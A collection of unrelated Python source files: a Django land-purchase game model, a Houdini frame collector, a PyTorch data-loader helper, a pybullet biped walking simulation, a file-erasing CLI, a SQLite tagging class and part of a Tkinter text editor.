raise Exception("Unable to rent landscape")
def on_rent(self) -> bool:
"""Return true if this landscape is on rent by a company"""
return self.is_rent
def already_bought(self) -> bool:
"""Return true if this landscape is already bought from a company"""
return self.is_buy
def can_be_purchased(self) -> bool:
"""Return true if this landscape can be purchased"""
return self.is_selling
def company_able_to_purchase(self, company: Company, method_acquired: str) -> bool:
"""Return true if this given company instance be able to buy the land
This function will check for balance left in company
"""
supported_methods_acquired = ['buy', 'rent', 'buy_cost', 'rent_cost']
if method_acquired.lower() in supported_methods_acquired and isinstance(method_acquired, str):
if not method_acquired.lower().endswith('_cost'):
method_acquired = method_acquired.lower() + '_cost'
if type(company) == Company:
return company.balance >= getattr(self, method_acquired)
raise TypeError("method_acquired param must be in supported methods but got %s instead" % method_acquired)
def save(self, *args, **kwargs) -> None:
"""Save the object to the database"""
if not self.id:
self.created_at = timezone.now()
self.updated_at = timezone.now()
return super().save(*args, **kwargs)
def purchase_landscape(self, company: Company) -> None:
"""The function will withdraw a certain amount of money from given company
:param company: The company instance that wish to own this landscape
DEPRECATED: consider using buy_landscape for better naming
This function does not call company_able_to_purchase_method, you must call it manually and before this function
or else an exception will be thrown or alternative way is you must call Company.can_own_landscape()
"""
if isinstance(company, Company):
self.company = company
self.company_name = company.company_name
if self.required_extra_continent_cost(company):
extra_cost = self.get_extra_contient_cost(company, 'buy')
company_new_balance = company.balance - (self.buy_cost + extra_cost)
else:
company_new_balance = company.balance - self.buy_cost
if company_new_balance < 0:
raise UnableToOwnLandscape("Company balance does not meet the requirements")
company.balance = company_new_balance
company.save()
self.buy()
else:
raise TypeError("The company param must be an instance of Company but got {} instead".format(type(company)))
def buy_landscape(self, company: Company) -> None:
"""The function will withdraw a certain amount of money from given company
:param company: The company instance that wish to own this landscape
This function does not call company_able_to_purchase_method, you must call it manually and before this function
or else an exception will be thrown or alternative way is you must call Company.can_own_landscape()
"""
if isinstance(company, Company):
self.company = company
self.company_name = company.company_name
if self.required_extra_continent_cost(company):
extra_cost = self.get_extra_contient_cost(company, 'buy')
company_new_balance = company.balance - (self.buy_cost + extra_cost)
else:
company_new_balance = company.balance - self.buy_cost
if company_new_balance < 0:
raise UnableToOwnLandscape("Company balance does not meet the requirements")
company.balance = company_new_balance
company.save()
self.buy()
else:
raise TypeError("The company param must be an instance of Company but got {} instead".format(type(company)))
def rent_landscape(self, company: Company) -> None:
"""The function will withdraw a certain amount of money from given company
:param company: The company instance that wish to own this landscape
This function does not call company_able_to_purchase_method, you must call it manually and before this function
or else an exception will be thrown or alternative way is you must call Company.can_own_landscape()
"""
if isinstance(company, Company):
self.company = company
self.company_name = company.company_name
if self.required_extra_continent_cost(company):
extra_cost = self.get_extra_contient_cost(company, 'rent')
company_new_balance = company.balance - (self.rent + extra_cost)
else:
company_new_balance = company.balance - self.rent_cost
if company_new_balance < 0:
raise UnableToOwnLandscape("Company balance does not meet the requirements")
company.balance = company_new_balance
company.save()
self.rent()
else:
raise TypeError("The company param must be an instance of Company but got {} instead".format(type(company)))
def required_extra_continent_cost(self, company: Company) -> bool:
"""
Return true if the there is an extra cost for owning a land
outside company registered country
Return False if there is no extra cost or invalid company object passing
"""
if type(company) == Company:
return company.continent != self.continent
return False
def get_extra_contient_cost(self, company: Company, method_acquired: str) -> Union[models.DecimalField, int]:
"""This method return the extra cost for owning the land that outside of
company registered continent.
:param company: the company instance that wants to buy the land
:param method_acquired: the method of owning the land that the company wish to own
must be present in string format (case insensitive but underscore must present).
Supported format: (continent_cost, continent_rent)
return extra cost in number format. If the company does not required extra continent cost
this method will return 0
"""
# preventing access to other attributes
supported_methods_acquired = ['continent_cost', 'continent_rent']
if method_acquired.lower() == 'buy':
method_acquired = 'continent_cost'
if not method_acquired.lower().startswith('continent_'):
method_acquired = 'continent_' + method_acquired.lower()
if self.required_extra_continent_cost(company) and method_acquired.lower() in supported_methods_acquired:
return getattr(self, method_acquired.lower())
return 0
def put_on_sale(self, company: Company, price: float) -> None:
"""
Put this landscape on sale. Currently only support buy method
This also means that the given company must own this landscape
"""
if type(company) == Company and isinstance(price, float):
if self.company_name == company.company_name and self.already_bought():
# only is the given company owns this landscape
self.is_selling = True
self.buy_cost = price
self.save()
def owned_by(self, company: Union[Company, str]) -> bool:
"""Return True if this landscape is owned by given company"""
if isinstance(company, str):
return self.company_name == company
elif type(company) == Company:
return self.company == company
raise TypeError("Company must be a string or a Company instance")
def needs_to_pay_rent(self):
"""Return true if the company needs to pay rent"""
if self.is_rent:
now: datetime = timezone.now()
return now - timedelta(days=7) >= self.last_collected_money_at
return False
def pay_rent(self, company: Company) -> None:
"""Pay the required rent. This method calls needs_to_pay_rent method directly
to check if the landscape needs to be paid. This is to ensure that user do not pay
too soon or too late.
"""
if self.needs_to_pay_rent():
# Only the same owner can pay the rent
if self.company == company:
company.balance -= self.rent_cost
if company.balance < 0:
raise ValueError("Insufficient amount of money to pay")
company.save()
self.last_collected_money_at = timezone.now()
def rent_overdue(self):
"""
Return true if the rent is overdue. This will be usually one month (30) days
"""
if self.is_rent:
now: datetime = timezone.now()
return now - timedelta(days=30) >= self.last_collected_money_at
return False
def can_create_rent_building(self, level: int):
"""
Return true if can create a building that is on rent on this landscape
"""
# check if no building on this land
if not hasattr(self, 'building'):
return 0 <= level <= self.level
def can_create_building(self, level: int):
"""
Return true if can construct a building and buy.
Regardless of method of acquiring. This always return True.
The level must be 0 but will return true as we will assume the level is 0
"""
# check if no building on this land
if not hasattr(self, 'building'):
return level == 0
def next_pay_rent_date(self) -> str:
"""Return the date that rent must be paid
in yyyy-mm-dd format
Please note that if the landscape is bought (not on rent) then it will return
the string "No payment required"
"""
if self.is_rent:
next_due = self.last_collected_money_at + timedelta(days=7)
return datetime.strftime(next_due, "%Y-%m-%d")
return "No payment required"
|
py | 7df7d2b86e0abff4de8f08b5e0979a3a00fe4c8e | import os
import re
import pyblish.api
from pype.houdini import lib
class CollectFrames(pyblish.api.InstancePlugin):
"""Collect all frames which would be a resukl"""
order = pyblish.api.CollectorOrder
label = "Collect Frames"
families = ["vdbcache"]
def process(self, instance):
ropnode = instance[0]
output_parm = lib.get_output_parameter(ropnode)
output = output_parm.eval()
file_name = os.path.basename(output)
match = re.match("(\w+)\.(\d+)\.vdb", file_name)
result = file_name
start_frame = instance.data.get("frameStart", None)
end_frame = instance.data.get("frameEnd", None)
if match and start_frame is not None:
# Check if frames are bigger than 1 (file collection)
# override the result
if end_frame - start_frame > 1:
result = self.create_file_list(match,
int(start_frame),
int(end_frame))
instance.data.update({"frames": result})
def create_file_list(self, match, start_frame, end_frame):
"""Collect files based on frame range and regex.match
Args:
match(re.match): match object
start_frame(int): start of the animation
end_frame(int): end of the animation
Returns:
list
"""
result = []
padding = len(match.group(2))
name = match.group(1)
padding_format = "{number:0{width}d}"
count = start_frame
while count <= end_frame:
str_count = padding_format.format(number=count, width=padding)
file_name = "{}.{}.vdb".format(name, str_count)
result.append(file_name)
count += 1
return result
|
py | 7df7d356da1641f7a415acb77141aca46a0e1334 | """
# data_getter
The data getter manages the initialization of different torch DataLoaders.
A dataloader is essentially an Iterable that can be called in a for-loop.
A typical training step could for example look like this:
data_loaders = data_getter.get_data_loaders(...)
for sample in data_loader['train']:
image, label = sample[0], sample[1]
prediction = model(image)
loss = loss_function(prediction, label)
...
A dataloader contains an object of class Dataset that handles the loading and augmentation process. 'ds_natural_images' gives an example for a custom
dataset.
'get_data_loaders' expects a string 'dataset' that identifies which dataset is to be used (e.g., mnist, cifar-10, ...). 'batch_size' denotes how many
samples (here mainly images) are combined to a mini-batch. A typical PyTorch
minibatch tensor of images has the dimension:
(batch_size, 3, height of image, width of image)
3 is the dimension of the three image channels red, green, and blue.
In 'run_training.py', batch_size is defined by the argument 'bs'.
'num_workers' defines how many processes load data in parallel. Using more than
one worker can, in specific cases, speed up the dataset loading process and
, thus, the entire training. If you want to debug your code, num_workers needs
to be set to 0.
In 'run_training.py', num_workers is defined by the argument 'nw'.
You can use kwargs (in 'run_training.py' the system argument 'ds_kwargs') to
pass configuration values that are very specific to a dataset.
kwargs is a dictionary of keyword-value pairs. EACH VALUE IS A LIST, even if it
only contains a single element. Furthermore, you need to take care of each
value's type. For example,
split_index = int(kwargs['split_index'][0])
contains a list with a string. To get the actual number, you'll need to typecast
it to an int.
For more information, see DLBio's 'kwargs_translator'.
To add a new dataset, you'll need to create a new file 'ds_[dataset_name].py'
in the 'data' folder. You'll need to create a class that inherits Dataset and
implements '__getitem__' and '__len__'. Furthermore, you'll need to define the
function 'get_dataloader'. Finally, you'll need to append an elif case to this
module's function 'get_data_loaders' that calls 'get_dataloader' and returns
a dictionary containing the keys 'train', 'val', and 'test'. If there is no
'val' or 'test' dataloader available, set these values to None.
'ds_natural_images.py' is an example of how to write a custom dataset.
"""
from . import ds_natural_images
from . import ds_cifar10
from . import ds_mnist
def get_data_loaders(dataset: str, batch_size: int, num_workers: int, **kwargs) -> dict:
if dataset == 'nat_im':
split_index = int(kwargs['split_index'][0])
return {'train': ds_natural_images.get_dataloader(
True, batch_size, split_index, num_workers=num_workers),
'val': ds_natural_images.get_dataloader(
False, batch_size, split_index, num_workers=num_workers),
'test': None
}
elif dataset == 'cifar_10':
return {
'train': ds_cifar10.get_data_loader(
is_train=True, batch_size=batch_size,
num_workers=num_workers
),
'val': ds_cifar10.get_data_loader(
is_train=False, batch_size=batch_size,
num_workers=num_workers
),
'test': None
}
elif dataset == 'mnist':
return{
'train': ds_mnist.get_dataloader(
True, batch_size=batch_size, num_workers=num_workers),
'val': ds_mnist.get_dataloader(
False, batch_size=batch_size, num_workers=num_workers),
'test': None
}
else:
raise ValueError(f'Unkown dataset: {dataset}')
|
py | 7df7d4f2d67548e8c1b06a5d6b14dabbb82f6e92 | """
bipedal robot walking simulation
by Einsbon (Sunbin Kim)
- GitHub: https://github.com/Einsbon
- Youtube: https://www.youtube.com/channel/UCt7FZ-8uzV_jHJiKp3NlHvg
- Blog: https://blog.naver.com/einsbon
"""
import pybullet as p
import time
from time import sleep
import pybullet_data
import numpy as np
import math
import os
import motorController
import walkGenerator
# motor parameters
motor_kp = 0.5
motor_kd = 0.5
motor_torque = 20
motor_max_velocity = 5.0
# physics parameters
fixedTimeStep = 1. / 2000
numSolverIterations = 200
physicsClient = p.connect(p.GUI)
p.setTimeStep(fixedTimeStep)
p.setPhysicsEngineParameter(numSolverIterations=numSolverIterations)
p.setAdditionalSearchPath(pybullet_data.getDataPath()) # to load plane.urdf
p.setGravity(0, 0, 0)
p.resetDebugVisualizerCamera(cameraDistance=1, cameraYaw=10, cameraPitch=-0, cameraTargetPosition=[0.4, 0, 0.1])
planeID = p.loadURDF("plane.urdf")
robotID = p.loadURDF(os.path.abspath(os.path.dirname(__file__)) + '/humanoid_leg_12dof.8.urdf', [0, 0, 0.31],
p.getQuaternionFromEuler([0, 0, 0]),
useFixedBase=False)
motorsController = motorController.MotorController(robotID, physicsClient, fixedTimeStep, motor_kp, motor_kd, motor_torque, motor_max_velocity)
print(motorsController.getRevoluteJoint_nameToId())
# %%
motorController.MotorController()
walk = walkGenerator.WalkGenerator()
walk.setWalkParameter(bodyMovePoint=8,
legMovePoint=8,
height=50,
stride=90,
sit=50,
swayBody=30,
swayFoot=0,
bodyPositionForwardPlus=5,
swayShift=3,
liftPush=0.5,
landPull=0.7,
timeStep=0.06,
damping=0.0,
incline=0.0)
walk.generate()
walk.inverseKinematicsAll()
walk.showGaitPoint3D()
actionTime = walk._timeStep
p.setGravity(0, 0, -9.8)
p.setRealTimeSimulation(0)
motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesStartRight[0], 2, 0)
# rest 1 second in engine
waitTime = 1
repeatTime = int(waitTime / fixedTimeStep)
for _ in range(repeatTime):
p.stepSimulation()
# time.sleep(fixedTimeStep)
p.setGravity(0, 0, -9.8)
rightStep = True
walkPointNum = walk._bodyMovePoint + walk._legMovePoint
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesStartLeft[i], actionTime, 0)
for _ in range(4):
for i in range(np.size(walk.walkAnglesWalkingRight, 0)):
motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesWalkingRight[i], actionTime, 0)
for i in range(np.size(walk.walkAnglesWalkingLeft, 0)):
motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesWalkingLeft[i], actionTime, 0)
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesEndRight[i], actionTime, 0)
'''
Implemented in a more complex way.
if rightStep == True:
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(
walk.inverseKinematicsPoint(walk.walkPointStartRightstepRightLeg[:, i], walk.walkPointStartRightstepLeftLeg[:, i]), actionTime, 0)
rightStep = False
else:
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(
walk.inverseKinematicsPoint(walk.walkPointStartLeftstepRightLeg[:, i], walk.walkPointStartLeftstepLeftLeg[:, i]), actionTime, 0)
rightStep = True
for i in range(4):
if(rightStep):
# right foot step
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(
walk.inverseKinematicsPoint(walk.walkPointRightStepRightLeg[:, i], walk.walkPointRightStepLeftLeg[:, i]), actionTime, 0)
rightStep = False
else:
# left foot step
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(
walk.inverseKinematicsPoint(walk.walkPointLeftStepRightLeg[:, i], walk.walkPointLeftStepLeftLeg[:, i]), actionTime, 0)
rightStep = True
if rightStep == True:
# end walking. left
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(
walk.inverseKinematicsPoint(walk.walkPointEndRightstepRightLeg[:, i], walk.walkPointEndRightstepLeftLeg[:, i]), actionTime, 0)
rightStep = False
else:
# end walking. left
for i in range(walkPointNum):
motorsController.setMotorsAngleInFixedTimestep(
walk.inverseKinematicsPoint(walk.walkPointEndLeftstepRightLeg[:, i], walk.walkPointEndLeftstepLeftLeg[:, i]), actionTime, 0)
rightStep = True
'''
# rest 2 seconds in engine
waitTime = 1
repeatTime = int(waitTime / fixedTimeStep)
for _ in range(repeatTime):
p.stepSimulation()
# robot control using (x,y,z) point.
motorsController.setMotorsAngleInFixedTimestep(walk.inverseKinematicsPoint([0, 0, 0], [0, 0, 0]), 0.5, 0.5)
motorsController.setMotorsAngleInFixedTimestep(walk.inverseKinematicsPoint([0, 0, 40], [0, 0, 40]), 0.5, 0.5)
motorsController.setMotorsAngleInFixedTimestep(walk.inverseKinematicsPoint([0, 0, 0], [0, 0, 0]), 0.5, 0.5)
motorsController.setMotorsAngleInFixedTimestep(walk.inverseKinematicsPoint([0, 0, 40], [0, 0, 40]), 0.5, 0.5)
motorsController.setMotorsAngleInFixedTimestep(walk.inverseKinematicsPoint([0, 30, 40], [0, 30, 40]), 0.5, 0.5)
motorsController.setMotorsAngleInFixedTimestep(walk.inverseKinematicsPoint([0, 0, 40], [0, 0, 40]), 0.5, 0.5)
# # More applied version. Press Enter to start or stop walking.
# walking = False
# rightStep = True
# while (1):
# keys = p.getKeyboardEvents()
# for k, v in keys.items():
# if (k == 65309) and (v == 3 or v == 6): # if enter key is pressed
# walking = True
# keys = {}
# if walking == True:
# if rightStep == True:
# for i in range(walkPointNum):
# motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesStartRight[i], actionTime, 0)
# rightStep = False
# else:
# for i in range(walkPointNum):
# motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesStartLeft[i], actionTime, 0)
# rightStep = True
# keys = p.getKeyboardEvents()
# for k, v in keys.items():
# if (k == 65309) and (v == 3 or v == 6): # if enter key is pressed
# walking = False
# keys = {}
# while (walking):
# if (rightStep):
# for i in range(walkPointNum):
# motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesWalkingRight[i], actionTime, 0)
# rightStep = False
# else:
# for i in range(walkPointNum):
# motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesWalkingLeft[i], actionTime, 0)
# rightStep = True
# keys = p.getKeyboardEvents()
# for k, v in keys.items():
# if (k == 65309) and (v == 3 or v == 6): # if enter key is pressed
# walking = False
# keys = {}
# if rightStep == True:
# for i in range(walkPointNum):
# motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesEndRight[i], actionTime, 0)
# rightStep = False
# else:
# for i in range(walkPointNum):
# motorsController.setMotorsAngleInFixedTimestep(walk.walkAnglesEndLeft[i], actionTime, 0)
# rightStep = True
# else:
# p.stepSimulation()
# %%
|
py | 7df7d5735eb450147b9727bb69c915b145b4df52 | import argparse
import logging
import logging.config
from eraser.eraser import Eraser
LOGGER = logging.getLogger(__name__)
def parse_arguments():
parser = argparse.ArgumentParser(description='Eraser target files and directories')
subparsers = parser.add_subparsers(help='sub-command help')
# Group: logging
log_group = parser.add_argument_group('logging')
log_group.add_argument('--loglevel', default='error', help='Logging ERROR by default',
choices=['debug', 'info', 'warning', 'error', 'critical'])
log_group.add_argument('--logformat', default='%(asctime)s - %(levelname)s - %(message)s')
# Group: retry
retry_group = parser.add_argument_group('retry')
retry_group.add_argument('--sleep', type=int, default=5,
help='Time to sleep the thread, 5 by default')
retry_group.add_argument('--max-retry', type=int, default=100,
help='How many times will attempt to erase the files, 100 by default')
# Subparser: targets
parser_targets = subparsers.add_parser('targets', help='targets help')
parser_targets.add_argument(
'targets', metavar='targets', type=str, nargs='+',
help='List of targets files and directories to be erased')
# Subparser: from_file
parser_from_file = subparsers.add_parser('from_file', help='targets from file help')
parser_from_file.add_argument('path', nargs=1, help='Path to the input file with the targets')
parser_from_file.add_argument('format', choices=['plain', 'json', 'xml'],
help='File format of the input file: plain, json, xml')
return parser.parse_args()
def config_logger(args):
numeric_level = getattr(logging, args.loglevel.upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: {}'.format(args.loglevel))
log_format = args.logformat
if log_format is None or len(log_format) == 0:
raise ValueError('Invalid log format: "{}"'.format(log_format))
logging.basicConfig(level=numeric_level, format=log_format)
def main():
args = parse_arguments()
config_logger(args)
LOGGER.debug(args)
if args.targets:
eraser = Eraser()
eraser.targets(args.targets)
eraser.erase()
if __name__ == '__main__':
main()
|
py | 7df7d767c39f455bc816f43725966ba92f7b78f9 |
from logging import getLogger
from pathlib import Path
import sqlite3
LOGGER = getLogger(__name__)
def iter2list(func):
def wrapper(*args, **kwargs):
return list(func(*args, **kwargs))
return wrapper
def from_path(path):
if isinstance(path, Path):
return str(path.absolute())
return path
class Db(object):
def __init__(self, multithread=False):
self.db = None
self.db_path = None
self.multithread = multithread
def open(self, path):
self.db_path = path
self.db = sqlite3.connect(path, check_same_thread=not self.multithread)
def close(self):
self.db_path = None
self.db.close()
self.db = None
def __enter__(self, *args):
return self.db.__enter__(*args)
def __exit__(self, *args):
return self.db.__exit__(*args)
def remove_file(self, path):
LOGGER.info("untracking file %r", path)
path = from_path(path)
self.db.execute('delete from tags_files where file = ?', (path,))
def remove_tag(self, name):
LOGGER.info("untracking tag %r", name)
self.db.execute('delete from tags_files where tag = ?', (name,))
def rename_tag(self, old, new):
LOGGER.info("renaming tag %r to %r", old, new)
self.db.execute('update tags_files set tag = ? where tag = ?', (new, old))
def rename_file(self, old, new):
LOGGER.info("renaming file %r to %r", old, new)
old = from_path(old)
new = from_path(new)
self.db.execute('update tags_files set file = ? where file = ?', (new, old))
def rename_folder(self, old, new):
LOGGER.info("renaming folder %r to %r", old, new)
old = from_path(old)
new = from_path(new)
# force slashes to avoid matching /aaabbb with /aaa pattern but only /aaa/bbb
old = old + '/'
new = new + '/'
# don't use LIKE in WHERE because old could contain '%' or metacharacters
self.db.execute(
'''
update tags_files
set file = ? || substring(file, ?)
where substring(file, 1, ?) = ?
''',
(new, len(old) + 1, len(old), old)
)
def tag_file(self, path, tags, start=None, end=None):
LOGGER.info("tagging file: %r + %r", path, tags)
if isinstance(tags, str):
tags = [tags]
path = from_path(path)
for tag in tags:
self.db.execute('insert or replace into tags_files (file, tag, start, end) values (?, ?, ?, ?)',
(path, tag, start, end))
def untag_file(self, path, tags):
LOGGER.info("untagging file: %r - %r", path, tags)
if isinstance(tags, str):
tags = [tags]
path = from_path(path)
for tag in tags:
self.db.execute('delete from tags_files where file = ? and tag = ?',
(path, tag))
untrack_file = remove_file
def list_tags(self):
for row in self.db.execute('select distinct tag from tags_files'):
yield row[0]
def list_files(self):
for row in self.db.execute('select distinct file from tags_files'):
yield row[0]
@iter2list
def find_tags_by_file(self, path):
path = from_path(path)
for row in self.db.execute('select distinct tag from tags_files where file = ?', (path,)):
yield row[0]
@iter2list
def find_files_by_tags(self, tags):
if isinstance(tags, str):
tags = [tags]
items = ','.join('?' * len(tags))
params = list(tags) + [len(tags)]
for row in self.db.execute('select file from tags_files where tag in (%s)'
' group by file having count(*) = ?' % items, params):
yield row[0]
@iter2list
def get_extras_for_file(self, path, tag):
path = from_path(path)
for row in self.db.execute('select start, end from tags_files where file = ? and tag = ?',
(path, tag)):
yield row[0], row[1]
def do_migrations(self):
c = self.db.cursor()
c.execute('create table if not exists version (version integer primary key)')
base_version = 0
for row in self.db.execute('select version from version'):
base_version = row[0]
for ver in range(base_version, max(UPGRADES) + 1):
LOGGER.debug("database migration for version %r", ver)
with self.db:
for stmt in UPGRADES[ver]:
self.db.execute(stmt)
self.db.execute('update version set version = ?', (ver + 1,))
# key: version to reach from preceding version
# value: list of statements to execute
UPGRADES = {
0: [
'insert into version values(0)',
'''
create table if not exists tags_files (
file, tag, start, end,
constraint pk_tf primary key(file, tag, start, end)
)
''',
'create index if not exists idx_tags on tags_files (tag)',
'create index if not exists idx_files on tags_files (file)',
],
}
|
py | 7df7d82051f88be4a5c53abffbfc8231d7aadacc | #!/usr/bin/python
# Texpert Text Editor
# Written by David Lawson
import os
import sys
import time
try:
import Tkinter as tk
import ScrolledText as tkst
import tkFileDialog
except:
import tkinter as tk
import tkinter.scrolledtext as tkst
import tkinter.filedialog as tkFileDialog
#Mode Colors (mutable)
darkbg, darkfg, darkins = ("#181818", "#F5F5F5", "#F5F5F5")
lightbg, lightfg, lightins = ("#F5F5F5", "#181818", "#181818")
legalbg, legalfg, legalins = ("#FFFFCC", "#181818", "#181818")
nightbg, nightfg, nightins = ("#181818", "#00FF33", "#00FF33")
root = tk.Tk()
root.title("Texpert")
root.geometry("700x500")
root.option_add("*Font", "TkDefaultFont 9")
current_file = None
#Main Frame
mainframe = tk.Frame(root, bd=1, relief='flat')
mainframe.pack(fill='both', expand=True, padx=0, pady=0)
#Text Area
texpert = tkst.ScrolledText(mainframe, undo=True, bd=0, font=("Arial 11"))
texpert.pack(side='bottom', fill='both', expand=True)
texpert.config(padx=2, pady=2, wrap="word", bg=lightbg, fg=lightfg,
insertbackground=lightins)
texpert.focus_set()
#StatusBar
statusbar = tk.Frame(root, bd=1, relief='sunken')
statusbar.pack(side='bottom', fill='x')
mode = tk.Label(statusbar, text=" Mode: Light")
mode.pack(side='left')
line_lbl = tk.Label(statusbar, text="Line 1, Col 1")
line_lbl.pack(side='right', padx=10)
#Menu Functions
#file menu
def new_com(event=None):
root.title("New Document - Texpert")
f = None
texpert.delete('1.0', 'end-1c')
def open_com(event=None):
f = tkFileDialog.askopenfile(parent=root, mode='rb', title="Select File",
filetypes = (("Text Files", "*.txt"),("All Files", "*.*")))
if f:
contents = f.read()
name = root.title((f.name) + " - Texpert")
texpert.delete('1.0', 'end-1c')
texpert.insert('1.0', contents)
f.close()
global current_file
current_file = f.name
def save_com(event=None):
if current_file:
f = open(current_file, "w")
data = texpert.get('1.0', 'end-1c')
f.write(data)
f.close()
else:
saveas_com()
def saveas_com(event=None):
f = tkFileDialog.asksaveasfile(mode='w',
filetypes = (("Text Files", "*.txt"),("All Files", "*.*")))
if f:
data = texpert.get('1.0', 'end-1c')
f.write(data)
f.close()
global current_file
current_file = f.name
#print/print preview not done
def print_com():
print("Printer not found")
def preview_com():
root.geometry("760x800+440+175")
texpert.config(padx=30, pady=8, wrap="word", font=('Arial 10'))
statusbar.pack_forget()
toolbar.pack_forget()
toolbar2.pack(side='top', anchor='n', fill='x')
def close_com(event=None):
root.title("Untitled - Texpert")
f = None
texpert.delete('1.0', 'end-1c')
def exit_com(event=None):
win = tk.Toplevel()
win.title("Exit")
xit = tk.Label(win, text="\nUnsaved work will be lost.\n\nAre you sure you want to exit?\n")
xit.pack()
ex = tk.Button(win, text="Exit", width=4, command=root.destroy)
ex.pack(side='left', padx=24, pady=4)
ex.focus_set()
ex.bind("<Return>", (lambda event: root.destroy()))
can = tk.Button(win, text="Cancel", width=4, command=win.destroy)
can.pack(side='right', padx=24, pady=4)
win.transient(root)
win.geometry('240x120')
win.wait_window()
#for print preview
def nine_font():
texpert.config(font=('Arial 9'))
def tenn_font():
texpert.config(font=('Arial 10'))
def levn_font():
texpert.config(font=('Arial 11'))
def twev_font():
texpert.config(font=('Arial 12'))
def fort_font():
texpert.config(font=('Arial 14'))
#edit menu
def undo_com():
texpert.edit_undo()
def redo_com():
texpert.edit_redo()
def cut_com():
texpert.event_generate("<<Cut>>")
def copy_com():
texpert.event_generate("<<Copy>>")
def paste_com():
texpert.event_generate("<<Paste>>")
def select_all(event=None):
texpert.tag_add('sel', '1.0', 'end-1c')
texpert.mark_set('insert', '1.0')
texpert.see('insert')
return 'break'
#view menu
def tool_bar():
if is_toolbar.get():
toolbar.pack_forget()
else:
toolbar.pack(side='top', anchor='n', fill='x')
def status_bar():
if is_statusbar.get():
statusbar.pack_forget()
else:
statusbar.pack(side='bottom', fill='x')
#modes for: [view > mode]
#tex.config makes note area match
def dark_mode():
mode["text"] = " Mode: Dark"
texpert.config(bg=darkbg, fg=darkfg, insertbackground=darkins)
#tex.config(bg=darkbg, fg=darkfg, insertbackground=darkins)
def light_mode():
mode["text"] = " Mode: Light"
texpert.config(bg=lightbg, fg=lightfg, insertbackground=lightins)
#tex.config(bg=lightbg, fg=lightfg, insertbackground=lightins)
def legal_mode():
mode["text"] = " Mode: Legal"
texpert.config(bg=legalbg, fg=legalfg, insertbackground=legalins)
#tex.config(bg=legalbg, fg=legalfg, insertbackground=legalins)
def night_mode():
mode["text"] = " Mode: Night"
texpert.config(bg=nightbg, fg=nightfg, insertbackground=nightins)
#tex.config(bg=nightbg, fg=nightfg, insertbackground=nightins)
def transparent():
if is_transparent.get():
root.wm_attributes('-alpha', 0.9)
else:
root.wm_attributes('-alpha', 1.0)
def blockcursor():
if is_blockcursor.get():
texpert.config(padx=2, pady=2, wrap="word", blockcursor=True)
else:
texpert.config(padx=2, pady=2, wrap="word", blockcursor=False)
def tray_com():
root.iconify()
def vertical_view():
root.attributes('-zoomed', False)
root.geometry("560x640+440+165")
texpert.config(padx=2, pady=2, wrap="word", font=("Arial 11"))
statusbar.pack(side='bottom', fill='x')
toolbar.pack(side='top', anchor='n', fill='x')
toolbar2.pack_forget()
def default_view(event=None):
root.attributes('-zoomed', False)
root.geometry("700x500+440+165")
texpert.config(padx=2, pady=2, wrap="word", font=("Arial 11"))
statusbar.pack(side='bottom', fill='x')
toolbar.pack(side='top', anchor='n', fill='x')
toolbar2.pack_forget()
def full_screen(event=None):
root.attributes('-zoomed', True)
texpert.config(padx=2, pady=2, wrap="word", font=("Arial 11"))
statusbar.pack(side='bottom', fill='x')
toolbar.pack(side='top', anchor='n', fill='x')
toolbar2.pack_forget()
#tools menu
def time_com():
ctime = time.strftime('%I:%M %p')
texpert.insert('insert', ctime, "a", ' ')
def date_com():
full_date = time.localtime()
day = str(full_date.tm_mday)
month = str(full_date.tm_mon)
year = str(full_date.tm_year)
date = "" + month + '/' + day + '/' + year
texpert.insert('insert', date, "a", ' ')
def fname():
texpert.insert('insert', current_file)
def note_area():
if is_notearea.get():
note_frame.pack(side='right', anchor='e', fill='y')
else:
note_frame.pack_forget()
#help menu
def about_com(event=None):
win = tk.Toplevel()
win.title("About")
bout = tk.Label(win, text="""\n\n\nTexpert
\nA small and lightweight text editor
\nMade in Python with Tkinter\n\n""")
bout.pack()
cre = tk.Button(win, text="Credits", width=4, command=credits_com)
cre.pack(side='left', padx=8, pady=4)
clo = tk.Button(win, text="Close", width=4, command=win.destroy)
clo.pack(side='right', padx=8, pady=4)
win.transient(root)
win.geometry('300x200+638+298')
win.wait_window()
def credits_com():
win = tk.Toplevel()
win.wm_attributes("-topmost", 0)
win.title("Credits")
cred = tk.Label(win, foreground="#404040",
text="""\n\n\nCreated by David Lawson
\n\nme = Person()\nwhile (me.awake()):\nme.code()\n""")
cred.pack()
lic = tk.Button(win, text="License", width=4, command=license_info)
lic.pack(side='left', padx=8, pady=4)
cls = tk.Button(win, text="Close", width=4, command=win.destroy)
cls.pack(side='right', padx=8, pady=4)
win.transient(root)
win.geometry('300x200+638+298')
win.wait_window()
def license_info():
win = tk.Toplevel()
win.wm_attributes("-topmost", 1)
win.title("License")
lic = tk.Label(win, justify='left', text="""\n\nMIT License
Copyright (c) 2019 David Lawson
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge,
publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF
ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
